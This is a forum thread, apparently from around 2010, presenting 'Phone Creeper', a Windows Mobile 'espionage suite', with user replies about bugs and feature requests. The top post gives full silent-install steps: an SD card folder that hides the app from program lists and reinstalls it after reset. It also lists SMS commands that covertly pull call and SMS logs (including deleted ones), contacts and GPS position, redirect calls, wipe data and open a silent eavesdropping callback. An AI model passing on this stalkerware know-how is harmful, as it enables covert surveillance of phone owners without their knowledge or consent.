[CLOSED][App][2010.12.13] Phone Creeper V0.98 (BETA) *** Espionage Suite

Status
Not open for further replies.
Search This thread

chetstriker

Mar 9, 2008
Brattleboro, VT
www.unfairware.com
Yes, It's been almost complete for awhile now. I'm just trying to finish off V1 leaving a nice and stable WM version first.
As of right now most functionality is already working for Android but under the covers it's quite different. The android version currently is uploading a copy of all data to an online SQL database where I was hoping to host a web interface.
The only hurdle left is with the actual SMS commands coming in. Currently the program will intercept them and instantly delete them if they are actually a command as opposed to a regular text message, the problem is that the notification bar shows that an incoming sms message has arrived even though it's already gone and clicking on the message just makes it disappear.
To solve this, I might make the control run through either a web page (the phone itself checks in for commands) or direct IP communications (most likely through an actual app remote control).
As it stands right now, all communications on my phone are being silently uploaded to an SQL database.
As for working on an HD running Android, it should work flawlessly. Unlike the WM version which is making low level calls directly to system dll files (more likely to have differences between vendors) and undocumented functions, the Android version is running completely native. It should run exactly the same on all devices.
Maybe I'll post an early sample version for people to try soon.

First thanks for a cool app. There have been a lot of 'spy' applications available commercially for smartphones for a long time now so i don't feel you have done anything to decrease security (in fact the opposite effect may be true as people become aware of the risks).

I'd be interested in hearing about progress of the Android version - I use a HTC HD2 running WM and your app at the moment and it is a lifesaver when losing or even leaving behind (at home, in the office) my phone.

I am also running android on that device and if in android I don't yet have such a solution. Would be interested to know whether you are close to having a workable product and indeed whether you have any knowledge of whether it's likely to work on android running on the HD2 hardware.

Last edited:
Reactions: nalexakis

insomia

Apr 29, 2007
hmm, that's a pretty bazaar feature but I'll think about it. I guess it wouldn't take too long to add.
Sorry for the delay on the next version, I'm just finishing it off. This one has ftp working properly, GPRS issue fixed and custom lock screen working peachy.
I'll probably release this version first, and then a ROM version shortly after.
More to come soon

wow, a reply from a master! big thanks.

while waiting for this wish prog to be materialized....im thinking of a self destruct(!) or auto device wipe feature that will also be an option aside from a "farewell message" if not cancel in a given time...hehehe. (whew! im a real paranoid here!)

just sharing my ideas and hopefully be lucky if will be included in the next releases.

again, thanks for your great program!

Jesterfell

Jun 12, 2008
Miami, FL
chetstriker gpson/gpsoff

THANK YOU!

I just discovered this program, I wish I had found it a couple of months ago (lost phone, "wrong" party found it, information compromised, huge overseas calls bill, etc...) Oh, well, life goes on.

So far, it works GREAT (still experimenting with commands, app conflicts, etc. just in case).

== REQUEST==

I would love commands to TURN ON/OFF the GPS chip. As it is, it is always on and the battery doesn't last as long as I'd like.

Maybe "chetstriker gpson" and "chetstriker gpsoff"

== /REQUEST==

AGAIN, THANK YOU

ATT/Cingular Tilt
WM 6.5 build 21907

m4f1050

Apr 20, 2007
Great idea! It will go in the next release.

Or maybe when you assign the getpos to enable GPS, get position, then disable it if it was disabled to begin with. Defiantely a great idea!

The call logs don't get sent (on WM HTC Imagio) when I request them, is that why the SQL server on Android? A call log can be huge, and via SMS that would probably take quite a bit of SMS if then can only be 160 characters long.

hell_madok

Aug 21, 2009
hello, congratulations for this great app.

I'm wondering if anyone had used it in a HTC HD2. I tried to test the command "chetstriker setemerg XXXX" (instead of XXXX I set my friend's number), but I received no "SUCESS" SMS as a feedback. But as I navigated on the storage card, i could see "sysemerg.ini" file in it. I opened it and saw the number I set up to be the emergency number. Well, up to here, it's fine. The problem is that when i switched my SIM card out of my HTC HD2 phone, and inserted a third SIM card (not my friend's number which i set to be the emergency number) to simulate a stolen phone using a new SIM card, the phonecreeper app just didn't SMS back to my friend's number (emergency) the info about the new SIM card. I tried sending a "helo" and a "fart" to the new SIM number, and I receive a SMS with SUCESS. Even "getpos" is working, I received 2 SMS containing coordinates and the second a google URL. I just don't know why it's not sending the new SIM number to the emergency number. I even set the emergency number with code area and without code area, but even ways it should work for sending SMS.

I tried twice installing the application on my phone, this V0.95 is the first I'm using. Please, give me some advice, or maybe this is just a feature not supported on my phone. :(

If you have doubt if I did a wrong installation, I think I didn't, because other commands are working.

Thanks for the app, and thanks for your time for reading this.

chetstriker

Mar 9, 2008
Brattleboro, VT
www.unfairware.com
You're quite possibly correct. Many of the inner workings of this program have changed dramatically and the communication technique had to be completely rewritten to work with many of the newer phones. But i'll start testing and either way the next versions goal is mostly focused on security based features. Thanks for the heads up though.

hello, congratulations for this great app.

I'm wondering if anyone had used it in a HTC HD2. I tried to test the command "chetstriker setemerg XXXX" (instead of XXXX I set my friend's number), but I received no "SUCESS" SMS as a feedback. But as I navigated on the storage card, i could see "sysemerg.ini" file in it. I opened it and saw the number I set up to be the emergency number. Well, up to here, it's fine. The problem is that when i switched my SIM card out of my HTC HD2 phone, and inserted a third SIM card (not my friend's number which i set to be the emergency number) to simulate a stolen phone using a new SIM card, the phonecreeper app just didn't SMS back to my friend's number (emergency) the info about the new SIM card. I tried sending a "helo" and a "fart" to the new SIM number, and I receive a SMS with SUCESS. Even "getpos" is working, I received 2 SMS containing coordinates and the second a google URL. I just don't know why it's not sending the new SIM number to the emergency number. I even set the emergency number with code area and without code area, but even ways it should work for sending SMS.

I tried twice installing the application on my phone, this V0.95 is the first I'm using. Please, give me some advice, or maybe this is just a feature not supported on my phone. :(

If you have doubt if I did a wrong installation, I think I didn't, because other commands are working.

Thanks for the app, and thanks for your time for reading this.

chetstriker

Mar 9, 2008
Brattleboro, VT
www.unfairware.com
Or maybe when you assign the getpos to enable GPS, get position, then disable it if it was disabled to begin with. Defiantely a great idea!

The call logs don't get sent (on WM HTC Imagio) when I request them, is that why the SQL server on Android? A call log can be huge, and via SMS that would probably take quite a bit of SMS if then can only be 160 characters long.

The i'll give that option for GPS also, however it means it takes a few minutes on some phones to turn on the GPS and get a fix from a cold start (some people just don't have the patience or think it's broken because the response wasn't immediate.) But I agree, it sure saves a lot of battery power.
I think I know of another method to grab call logs you might have to let me know if it works or not. (the differences in how devices respond is pretty annoying.) Strangely enough it's the Microsoft managed code that seems to have stopped working for the newer devices as opposed to the direct system calls. And I thought the P/Invoke commands were supposed to be the undependable ones.

As for The getcalllogs command, it only grabs the most recent 10 calls SINCE the program has been installed. It always starts with a blank slate. It does this as opposed to reading the actual call log because people might have deleted history from the call log. This method records everything as it happens so even if they delete it, the log is still there. I'll start doing more tests of the feature though. If more than the last 10 calls are wanted than the logsize command can be used to set it from anywhere between the last 5 - 25 calls.

For the Android version using MSSQL, this is mainly because i'm not sure i'll be able to have SMS be the method for communication because even though the messages are intercepted and instantly deleted, the notification bar still displays that a message has arrived. I'm using a web hosted MSSQL server so that I would be able to give users a web interface to view logs (without log size worries ) and also where they will enter the commands and the phone will check in by itself to run the new instructions. I hope to allow the WM version to do the same after.

princeasi

Sep 16, 2006
Los Angeles
@ chetsteiker: I have the latest beta version installed. I've been using the getpos command and it keeps sending me the GPS coordinate dating back to 10/6/10. I've tried reinstalling it but it still sends the same coordinates from that date. How can I fix this?

enzyme

Sep 30, 2008
having trouble with the changing of log size....

To change log size (for calls and sms, default:10 min:5 max:25)
chetstriker logsize number_between_5_and_25

can someone help me with the command to set log at 20 please?

chetstriker

Mar 9, 2008
Brattleboro, VT
www.unfairware.com
It's just chetstriker logsize 20, however keep in mind this doesn't mean pull the last 20 logs from history. Logs are not created by just pulling the info directly from the phone because the user may have deleted calls or text messages. To ensure logs are accurately showing everything, the log starts blank when phone creeper is installed and then records them as soon as they hit or leave the phone before anything can happen to them.
This means that before you actually see 20 logs, you must have had that many events (calls or text message) sent or received SINCE installing the program.
After the 20 records have been collected, the most recent will stay and the oldest will be over written. This is because if the log files weren't limited then the amount of sms messages it would take to view them all would be overwhelming.

having trouble with the changing of log size....

can someone help me with the command to set log at 20 please?

chetstriker

Mar 9, 2008
Brattleboro, VT
www.unfairware.com
Is there a code site used for development? I heard that this has started development for android OS, of which I can test and develop for.

Not yet, I haven't posted anything yet. I won't even get my phone back for another week or two (letting someone borrow it.) Also I was trying to finish off a little more with the WM version before throwing out the Android one.
As soon as I get my phone back, I'll try to upload an alpha demo and add links to from this forum to the android forum.

DopeyOne

Apr 26, 2007
First of all, THANK YOU! This is a wikkid little program!

Just a quick question, in my area the only time we get a GPS lock is if we are outside (even then it depends on the weather). So if the gps is on all the time and it doesnt have a lock at that point in time, what are the chances of it sending the last known co-ordinate with a note saying "last known". At the moment it just responds with a lat and long of 0,0.

Also does it utilise AGPS to speed the lock times up?

What would be really cool is if it had a "track" mode, so it would log the gps co-ords every 5 minutes or so. Then dump that log onto an ftp.

Thank you again and a small donation has been sent your way :D keep up the good work!

m4f1050

Apr 20, 2007
^ +1 ... That would be a nice feature. call it "getmultipos" :)

With timestamp. Maybe an app to show the positions?

DopeyOne

Apr 26, 2007
Just another thought, if it doesnt have a GPS lock then could you use the data from the HTC location service? Or if ts a non HTC device, cell tower ID?

Status
Not open for further replies.

Top Liked Posts

• There are no posts matching your filters.
    STILL GOING!
    Thank You to those who donated, even a small amount is appreciated and helps keep motivation going :>

sniff15
    Jesterfell
    johnnyme (big thanks)
    lucifer_fallen_angel
    cambot5k
    HTC - 2ND
    RavenTBK
    X-Mod
    serveradmnstrtr
    amedeus
    isyami
    radi0chik
    mygoogoo

*** WHAT IT DOES ***

This is a phone espionage suite.
    It can be silently installed by just inserting an sd card with the files below on it.
    The program does not show up under installed programs or running programs and allows for a useful array or features. Phones running this software can be remotely controled by sms text messages. All commands will be silently received and deleted immediately and results will be issued back to sender.
    pre-configured settings can be added to the installer to have your own default password and phone number to receive live updates. By default, this program will silently reinstall itself even after a hard reset, if the memory card with these files is still in the device.

Currently it has the following features:

To receive live updates of SMS and Call activity to your FTP server (setupftp must be set first):
    chetstriker ftplive

To add phone number to your ignore log list (it won't create logs of these numbers)
    chetstriker addign 8005551212

To remove phone number from your ignore log list (it will log this number again)
    chetstriker delign

To receive received call logs, send the following text to phone with this installed on it:
    chetstriker getreccalls
    To view sent call logs (even deleted):
    chetstriker getsentcalls
    To view received SMS logs (even deleted):
    chetstriker getrecsms
    To view sent SMS logs (even deleted):
    chetstriker getsentsms
    To test if phone creeper is running (discreetly):
    helo
    chetstriker turnonringer

To retrieve the external IP Address of your phone, assuming connected:
    chetstriker getip
    To receive last 10 call logs(even if deleted):
    chetstriker getcalllogs
    To receive live SMS notifications on SMS and CALL transactions:
    chetstriker liveon
    To turn off live notifications:
    chetstriker liveoff
    To lock PDA:
    chetstriker lock
    To run a program (exec is the program name):
    chetstriker run exec
    To run a program (exec is the program name, arg is any arguments added):
    chetstriker run exec | arg
    To setup FTP account to retreive without SMS (make sure you add space | space in between):
    chetstriker setupftp url @ user @ pass
    To setup FTP account (use this if not using default port 21):
    chetstriker setupftp url @ user @ pass @ port
    To setup FTP account (use this if ftp not saving to default base path):
    chetstriker setupftp url @ user @ pass @ port @ ftp_path

To receive any log by ftp, you can pre-seed any get command with ftp:
    example:
    chetstriker getcalllogs would become chetstriker ftpgetcalllogs

To add call blocking: (communication either way with specified number will disconnect)
    chetstriker addblk 8005551212
    To add call redirecting: (if phone dials a specific nuumber it will cancel and dial an alternate number instead)
    chetstriker addredir ifthisnumbercalls sendtothisnumber
    To remove call blocks:
    chetstriker delblks
    To remove call redirects:
    chetstriker delredir
    To get contacts: (from memory)
    chetstriker getcontacts
    To get appointments:
    chetstriker getappts
    To get tasks:
    chetstriker gettasks
    To set emergency SMS number:
    chetstriker setemerg 8005551212
    To get phone info: (IMEI, username, email, radio version, etc.)
    chetstriker getinfo
    To get gps location and google maps link:
    chetstriker getpos
    Deletes Contacts, Appointments, Task:
    chetstriker deleteaccts
    Displays command list:
    chetstriker help
    To delete all SMS messages:
    chetstriker delallsms
    To delete received SMS messages:
    chetstriker delrecsms
    To delete sent SMS messages:
    chetstriker delsentsms
    To wipe your storage card:
    chetstriker wipeflash
    To send a fart:
    chetstriker fart
    To send a pop-up message:
    chetstriker message "insert msg here, without quotes"
    To create a silent callback through remote speakerphone:
    chetstriker callback
    To bounce sms off phone to someone else:
    chetstriker bounce sms "phone number to send to" "message to send"
    To send your eaves droping call to someone else:
    chetstriker bounce call "phone number to send to" "message to send"
    To change password:
    chetstriker change "newpassword"
    (Obviously change "newpassword" to be what ever password you want and don't type the quotes.)
    After you have changed your password, make sure you use the new commands accordingly. For example, if I changed the password to yellow and wanted to get call history. I would from now on type:
    yellow getcalls

all results will be sent via SMS back without leaving any trace on the phone being controlled.
    Any cell phone can be used to initiate the commands and all commands will respond with a success message for acknowledgement.

by default the password is "chetstriker", obviously not including the quotes.
    the command structure is (password and then command)

*** HOW TO USE IT ***

-- RemoveCreeper --
    if you have ever installed Phone Creeper, run this to make sure all old files are deleted before installing new version. Just unzip, copy .exe file to PDA and run it from PDA. There is no interface or acknowledgement., it takes about 3 seconds to run. Also make sure the 2577 folder is deleted from your memory card (If you used the silent install method) so that it doesn't automatically reinstall after.

-- Regular Install with uninstall option --
    Just install .cab on wm5 or higher phone, requires .NET CF 3.5.
    MAKE SURE YOU SELECT Device instead of SC card for installation.

-- Silent auto install version (Currently the only method) --
    Unzip 2577 folder to root of storage card. After inserting storage card into PDA, it will automaticaly without notice remove old version, install new version and auto start process so reboot is NOT needed. This will also not add entries to startup or remove programs, so the RemoveCreeper file is needed to remove it in the future if you want.
    To pre-configure default password, create a file named sysinfo.ini with the password you want in caps and place the file in the 2577 folder before inserting into the device.
    To pre-configure enabling the live feature and sending you messages, create a file named live.ini with the phone number you want to receive the live messages (use numbers only) and place the file in the 2577 folder before inserting into the device.

<< Anti-Creeper Project now started as mentioned earlier >>

If you like this program, please feel free to DONATE
    How about calling it The Stalker? :eek:
    will this work with any phone?
    It should work on any WM5 - WM6.5.
    I'm not sure if it will work on previous versions.
    I'm running this on a WM 6.1 now.
    Great .. I love to test it out !!!..

I am running WM 6.5...